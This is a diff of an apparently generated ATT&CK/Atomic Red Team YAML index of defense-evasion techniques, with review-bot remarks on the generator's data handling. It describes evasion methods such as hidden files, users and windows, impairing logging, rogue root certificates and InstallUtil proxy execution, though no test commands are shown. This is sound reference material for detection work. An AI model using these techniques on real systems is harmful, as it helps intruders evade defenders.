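Review bot: The new T1564.005 entry lists `Windows Registry` as a data source (L88918) while its platforms include Linux and macOS (L88933–L88934), so anything that derives per-platform detection coverage from this index will credit Linux/macOS with a telemetry source that does not exist there. This looks like a verbatim copy of the upstream ATT&CK object and should not be hand-patched in a generated file, but the generator or its consumers need to know that `x_mitre_data_sources` is the union across all listed platforms rather than a per-platform list. The detection text on L88922–L88929 already hedges this ("depending on the implementation"); a short note in the generator's README, or a filter that drops Windows-only sources for non-Windows platforms, would make the limitation explicit. The entry also ships with `atomic_tests: []` (L88936), so no coverage is claimed yet.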
@@ -24191,25 +24954,6 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Hidden Files and Directories
- description: |-
- Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
-
- On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
-
- Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
-
- Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
- id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T22:32:25.985Z'
- created: '2020-02-26T17:46:13.128Z'
x_mitre_platforms:
- Windows
- macOS
@@ -24382,19 +25126,19 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:36:25.994Z'
created: '2020-03-13T20:12:40.876Z'
- x_mitre_platforms:
- - macOS
- x_mitre_detection: This technique prevents the new user from showing up at the
- log in screen, but all of the other signs of a new user still exist. The user
- still gets a home directory and will appear in the authentication logs.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - root
- - Administrator
x_mitre_data_sources:
- File monitoring
- Authentication logs
+ x_mitre_permissions_required:
+ - root
+ - Administrator
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: This technique prevents the new user from showing up at the
+ log in screen, but all of the other signs of a new user still exist. The user
+ still gets a home directory and will appear in the authentication logs.
+ x_mitre_platforms:
+ - macOS
identifier: T1564.002
atomic_tests:
- name: Hidden Users
@@ -24442,8 +25186,8 @@ defense-evasion:
may be utilized by system administrators to avoid disrupting user work environments
when carrying out administrative tasks. \n\nOn Windows, there are a variety
of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001),
- Jscript, and [VBScript](https://attack.mitre.org/techniques/T1059/005) to
- make windows hidden. One example of this is powershell.exe -WindowStyle
+ Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005)
+ to make windows hidden. One example of this is powershell.exe -WindowStyle
Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the
configurations for how applications run are listed in property list (plist)
files. One of the tags in these files can be apple.awt.UIElement,
@@ -24460,26 +25204,26 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:49:43.557Z'
created: '2020-03-13T20:26:49.433Z'
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - PowerShell logs
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitor processes and command-line arguments for actions
indicative of hidden windows. In Windows, enable and configure event logging
and PowerShell logging to check for the hidden window style. In MacOS, plist
files are ASCII text files with a specific format, so they're relatively easy
to parse. File monitoring can check for the apple.awt.UIElement
or any other suspicious plist tag in plist files and flag them.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Travis Smith, Tripwire
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - PowerShell logs
+ x_mitre_platforms:
+ - macOS
+ - Windows
identifier: T1564.003
atomic_tests:
- name: Hidden Window
@@ -24501,27 +25245,40 @@ defense-evasion:
name: powershell
T1564:
technique:
+ id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
+ description: |-
+ Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
+
+ Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
+ name: Hide Artifacts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1564
url: https://attack.mitre.org/techniques/T1564
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Hide Artifacts
- description: "Adversaries may attempt to hide artifacts associated with their
- behaviors to evade detection. Operating systems may have features to hide
- various artifacts, such as important system files and administrative task
- execution, to avoid disrupting user work environments and prevent users from
- changing files or features on the system. \n\nAdversaries may abuse these
- features to hide artifacts such as files, directories, user accounts, or other
- system activity to evade detection. "
- id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
+ - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ source_name: Sofacy Komplex Trojan
+ - url: https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty
+ description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved
+ July 8, 2017.
+ source_name: Cybereason OSX Pirrit
+ - url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
+ description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams.
+ Retrieved March 21, 2018.
+ source_name: MalwareBytes ADS July 2015
+ - source_name: Sophos Ragnar May 2020
+ url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
+ description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys
+ virtual machine to dodge security. Retrieved June 29, 2020.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T22:49:43.726Z'
+ modified: '2020-07-06T19:03:40.511Z'
created: '2020-02-26T17:41:25.933Z'
x_mitre_platforms:
- Linux
@@ -24529,10 +25286,10 @@ defense-evasion:
- Windows
x_mitre_is_subtechnique: false
x_mitre_version: '1.0'
- x_mitre_detection: 'Monitor files, processes, and command-line arguments for
+ x_mitre_detection: Monitor files, processes, and command-line arguments for
actions indicative of hidden artifacts. Monitor event and authentication logs
for records of hidden artifacts being used. Monitor the file system and shell
- commands for hidden attribute usage. '
+ commands for hidden attribute usage.
x_mitre_data_sources:
- API monitoring
- PowerShell logs
@@ -24556,7 +25313,7 @@ defense-evasion:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Hijack Execution Flow
description: |-
- Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as whitelisting or other restrictions on execution.
+ Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6
@@ -24568,17 +25325,15 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T17:33:44.855Z'
+ modified: '2020-06-26T16:09:59.324Z'
created: '2020-03-12T20:38:12.465Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Environment variable
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - DLL monitoring
x_mitre_detection: |-
Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
@@ -24591,40 +25346,48 @@ defense-evasion:
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
- x_mitre_data_sources:
- - Environment variable
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - DLL monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1562:
technique:
+ id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529
+ description: |-
+ Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
+
+ Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
+ name: Impair Defenses
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1562
url: https://attack.mitre.org/techniques/T1562
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Impair Defenses
- description: |-
- Adversaries may maliciously modify a victim system in order hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
-
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
- id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T22:18:11.350Z'
+ modified: '2020-07-09T14:43:42.718Z'
created: '2020-02-21T20:22:13.470Z'
x_mitre_platforms:
- Linux
- Windows
- macOS
+ - AWS
+ - GCP
+ - Azure
x_mitre_data_sources:
+ - GCP audit logs
+ - Azure activity logs
+ - AWS CloudTrail logs
- Anti-virus
- Services
- API monitoring
@@ -24655,29 +25418,7 @@ defense-evasion:
atomic_tests: []
T1562.006:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1562.006
- url: https://attack.mitre.org/techniques/T1562/006
- - external_id: CAPEC-571
- source_name: capec
- url: https://capec.mitre.org/data/definitions/571.html
- - url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A
- description: Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved
- September 6, 2018.
- source_name: Microsoft Lamin Sept 2017
- - source_name: Microsoft About Event Tracing 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
- description: Microsoft. (2018, May 30). About Event Tracing. Retrieved June
- 7, 2019.
- - source_name: Medium Event Tracing Tampering 2018
- url: https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
- description: 'Palantir. (2018, December 24). Tampering with Windows Event
- Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indicator Blocking
+ id: attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da
description: "An adversary may attempt to block indicators or events typically
captured by sensors from being gathered and analyzed. This could include maliciously
redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based
@@ -24697,15 +25438,39 @@ defense-evasion:
forwarding telemetry and/or creating a host-based firewall rule to block traffic
to specific hosts responsible for aggregating events, such as security information
and event management (SIEM) products. "
- id: attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da
+ name: Indicator Blocking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1562.006
+ url: https://attack.mitre.org/techniques/T1562/006
+ - external_id: CAPEC-571
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/571.html
+ - url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A
+ description: Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved
+ September 6, 2018.
+ source_name: Microsoft Lamin Sept 2017
+ - source_name: Microsoft About Event Tracing 2018
+ url: https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
+ description: Microsoft. (2018, May 30). About Event Tracing. Retrieved June
+ 7, 2019.
+ - source_name: Medium Event Tracing Tampering 2018
+ url: https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
+ description: 'Palantir. (2018, December 24). Tampering with Windows Event
+ Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.'
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-19T19:20:39.087Z'
+ modified: '2020-07-09T14:43:42.450Z'
created: '2020-03-19T19:09:30.329Z'
x_mitre_platforms:
- Windows
+ - macOS
+ - Linux
x_mitre_contributors:
- Rob Smith
x_mitre_data_sources:
@@ -24744,13 +25509,15 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:03:09.766Z'
created: '2020-03-19T21:27:32.820Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_defense_bypassed:
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
- Anti-virus
- - Host intrusion prevention systems
- - Log analysis
- - Signature-based detection
+ - Binary file metadata
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
or other security tool alert. Similar events may also occur at the boundary
through network IDS, email scanning appliance, etc. The initial detection
@@ -24760,17 +25527,15 @@ defense-evasion:
operation, assuming that individual events like an anti-virus detect will
not be investigated or that an analyst will not be able to conclusively link
that event to other activity occurring on the network.
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_defense_bypassed:
- Anti-virus
- - Binary file metadata
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ - Host intrusion prevention systems
+ - Log analysis
+ - Signature-based detection
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
- T1551:
+ T1070:
technique:
id: attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
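Review bot: The index key for this technique changes from `T1551:` to `T1070:` (the `+ T1070:` line at the end of this hunk), and the two hunks that follow (`@@ -24781,8 +25546,8 @@` and `@@ -24794,28 +25559,28 @@`) change the `external_id`, `url` and `identifier: T1070` to match. Anything that looks the technique up by the old ID — an atomic test folder name, a CSV or markdown index, a runner keyed on `identifier` — will no longer find the entry, and none of that is visible in this chunk, so it is worth confirming those were renamed in the same commit. If this file is generated from the upstream STIX bundle, as the wholesale key reordering in every hunk suggests, the rename itself is upstream data and needs no change here.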
@@ -24781,8 +25546,8 @@ defense-evasion:
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
external_references:
- source_name: mitre-attack
- external_id: T1551
- url: https://attack.mitre.org/techniques/T1551
+ external_id: T1070
+ url: https://attack.mitre.org/techniques/T1070
- external_id: CAPEC-93
source_name: capec
url: https://capec.mitre.org/data/definitions/93.html
@@ -24794,28 +25559,28 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:43:29.196Z'
created: '2017-05-31T21:30:55.892Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_detection: File system monitoring may be used to detect improper deletion
+ or modification of indicator files. Events not stored on the file system
+ may require different detection mechanisms.
+ x_mitre_defense_bypassed:
+ - Log analysis
+ - Host intrusion prevention systems
+ - Anti-virus
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- API monitoring
- Windows event logs
- x_mitre_defense_bypassed:
- - Log analysis
- - Host intrusion prevention systems
- - Anti-virus
- x_mitre_detection: File system monitoring may be used to detect improper deletion
- or modification of indicator files. Events not stored on the file system
- may require different detection mechanisms.
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- identifier: T1551
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '1.1'
+ identifier: T1070
atomic_tests:
- name: Indicator Removal using FSUtil
auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435
@@ -24835,13 +25600,8 @@ defense-evasion:
elevation_required: true
T1202:
technique:
- id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1202
@@ -24858,13 +25618,18 @@ defense-evasion:
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
source_name: RSA Forfiles Aug 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ name: Indirect Command Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-02-05T14:28:08.379Z'
+ modified: '2020-06-20T22:09:22.559Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_version: '1.1'
x_mitre_contributors:
@@ -24876,9 +25641,8 @@ defense-evasion:
- Windows event logs
x_mitre_defense_bypassed:
- Static File Analysis
- - Application whitelisting
- - Process whitelisting
- - Whitelisting by file name or path
+ - Application control
+ - Application control by file name or path
x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
such as Sysmon, for events such as process creations that include or are resulting
from parameters associated with invoking programs/commands/files and/or spawning
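Review bot: The `x_mitre_defense_bypassed` vocabulary changes from the `whitelisting` wording to `Application control` and `Application control by file name or path` in this hunk, and the same rename appears in the hunks at `@@ -25167,29 +25931,29 @@`, `@@ -26456,7 +27226,7 @@` and `@@ -26502,25 +27272,25 @@`. The T1149 entry in `@@ -25785,35 +26549,37 @@` still carries `Application whitelisting`, `Process whitelisting` and `Whitelisting by file name or path`, so after this change both spellings coexist in the file and any consumer that filters or groups on these strings needs to accept both or map the old ones onto the new. Those values presumably come straight from the upstream data (that object is marked `x_mitre_deprecated: true` and was evidently not updated there), so a fix, if one is wanted, belongs in a normalization step rather than in this generated file.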
@@ -24989,13 +25753,18 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-19T20:31:11.389Z'
created: '2020-02-21T21:05:32.844Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Matt Graeber, @mattifestation, SpecterOps
+ - Red Canary
+ - Travis Smith, Tripwire
+ - Itzik Kotler, SafeBreach
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Digital certificate logs
x_mitre_detection: |-
A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
@@ -25009,18 +25778,13 @@ defense-evasion:
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Digital certificate logs
- x_mitre_contributors:
- - Matt Graeber, @mattifestation, SpecterOps
- - Red Canary
- - Travis Smith, Tripwire
- - Itzik Kotler, SafeBreach
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1553.004
atomic_tests:
- name: Install root CA on CentOS/RHEL
@@ -25147,7 +25911,7 @@ defense-evasion:
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe.
- InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
+ InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
name: InstallUtil
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -25167,29 +25931,29 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T15:45:33.971Z'
+ modified: '2020-06-20T22:34:46.529Z'
created: '2020-01-23T19:09:48.811Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Process whitelisting
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Casey Smith
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior
history of known good arguments and executed binaries to determine anomalous
and potentially adversarial activity. Command arguments used before and after
the InstallUtil.exe invocation may also be useful in determining the origin
and purpose of the binary being executed.
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Casey Smith
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.004
atomic_tests:
- name: CheckIfInstallable method call
@@ -25742,19 +26506,19 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-02-10T19:52:47.724Z'
created: '2020-02-10T19:49:46.752Z'
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Binary file metadata
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment, look
for invalid signatures as well as unusual certificate characteristics and
outliers.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Binary file metadata
+ x_mitre_platforms:
+ - macOS
+ - Windows
atomic_tests: []
T1149:
technique:
@@ -25785,35 +26549,37 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-30T13:53:57.518Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - Binary file metadata
- - Malware reverse engineering
- - Process monitoring
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - macOS
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Application whitelisting
+ - Process whitelisting
+ - Whitelisting by file name or path
x_mitre_detection: Determining the original entry point for a binary is difficult,
but checksum and signature verification is very possible. Modifying the LC_MAIN
entry point or adding in an additional LC_MAIN entry point invalidates the
signature for the file and can be detected. Collect running process information
and compare against known applications to look for suspicious behavior.
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Process whitelisting
- - Whitelisting by file name or path
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_platforms:
- - macOS
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_data_sources:
+ - Binary file metadata
+ - Malware reverse engineering
+ - Process monitoring
+ x_mitre_version: '2.0'
atomic_tests: []
T1574.006:
technique:
id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
description: |-
